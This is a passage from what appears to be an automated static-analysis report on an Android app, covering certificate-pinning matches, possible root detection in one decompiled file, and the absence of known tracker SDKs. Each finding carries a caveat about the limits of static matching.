Note: This is a static match on pinning APIs, typically inside an HTTP client library, and does not show that a pin set is actually configured for the app's own hosts. Confirm dynamically by intercepting traffic with a user-installed CA and checking that the app's connections fail.
Passed: This application may implement root detection.
Reference: https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05j-Testing-Resiliency-Against-Reverse-Engineering.md#testing-root-detection-mstg-resilience-1
Files: n3/i.java, line(s) 62
Note: A single matched line is a weak signal; it may be a library checking for a su binary or test-keys build rather than an app-level control, and it says nothing about what the app does when the check fires.
Passed: This application contains no privacy trackers.
No user or device trackers were found during static analysis, which compares the app's packages against a list of known tracker SDK signatures; tracking implemented through a WebView or a custom network endpoint would not be detected this way.